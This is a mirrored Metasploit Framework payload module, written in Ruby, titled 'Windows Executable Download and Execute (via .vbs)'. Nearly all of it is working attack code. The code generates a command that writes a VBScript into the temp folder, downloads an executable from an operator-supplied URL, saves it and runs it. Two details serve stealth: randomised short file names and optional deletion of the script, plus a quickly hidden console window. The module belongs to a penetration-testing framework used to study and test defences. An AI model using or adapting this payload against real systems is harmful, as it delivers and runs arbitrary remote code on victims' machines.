CoCalc -- download_exec

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
¹⁹⁵⁹¹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  CachedSize = :dynamic
8

9
  include Msf::Payload::Single
10
  include Msf::Sessions::CommandShellOptions
11

12
  def initialize(info = {})
13
    super(
14
      merge_info(
15
        info,
16
        'Name' => 'Windows Executable Download and Execute (via .vbs)',
17
        'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
18
        'Author' => 'scriptjunkie',
19
        'License' => BSD_LICENSE,
20
        'Platform' => 'win',
21
        'Arch' => ARCH_CMD,
22
        'Handler' => Msf::Handler::None,
23
        'Session' => Msf::Sessions::CommandShell,
24
        'PayloadType' => 'cmd',
25
        'RequiredCmd' => 'wscript',
26
        'Payload' => {
27
          'Offsets' => {},
28
          'Payload' => ''
29
        }
30
      )
31
    )
32

33
    register_options(
34
      [
35
        OptString.new('URL', [ true, 'The pre-encoded URL to the executable' ]),
36
        OptString.new('EXT', [ true, 'The extension to give the saved file', 'exe' ]),
37
        OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),
38
        OptBool.new('DELETE', [ true, 'Delete created .vbs after download', true ])
39
      ]
40
    )
41
  end
42

43
  def generate(_opts = {})
44
    return super + command_string
45
  end
46

47
  def command_string
48
    # It's already long. Keep variable names short.
49
    vbsname = Rex::Text.rand_text_alpha(1..2)
50
    exename = Rex::Text.rand_text_alpha(1..2)
51
    xmlhttpvar = Rex::Text.rand_text_alpha(1..2)
52
    streamvar = Rex::Text.rand_text_alpha(1..2)
53

54
    command = ''
55
    command << 'cmd.exe /q /c ' if datastore['INCLUDECMD']
56
    # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
57
    # disappears quickly before the wscript libraries load and the file downloads
58
    command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):" \
59
               "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:" \
60
               "#{xmlhttpvar}.Send:" \
61
               "Set #{streamvar}=CreateObject(\"ADODB.Stream\"):" \
62
               "#{streamvar}.Type=1:" \
63
               "#{streamvar}.Open:" \
64
               "#{streamvar}.Write #{xmlhttpvar}.responseBody:" \
65
               "#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:" \
66
               "CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
67
    command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
68
    command << " >#{vbsname}.vbs" \
69
               "&start wscript #{vbsname}.vbs"
70
  end
71
end
72

73
Product

Resources

Company
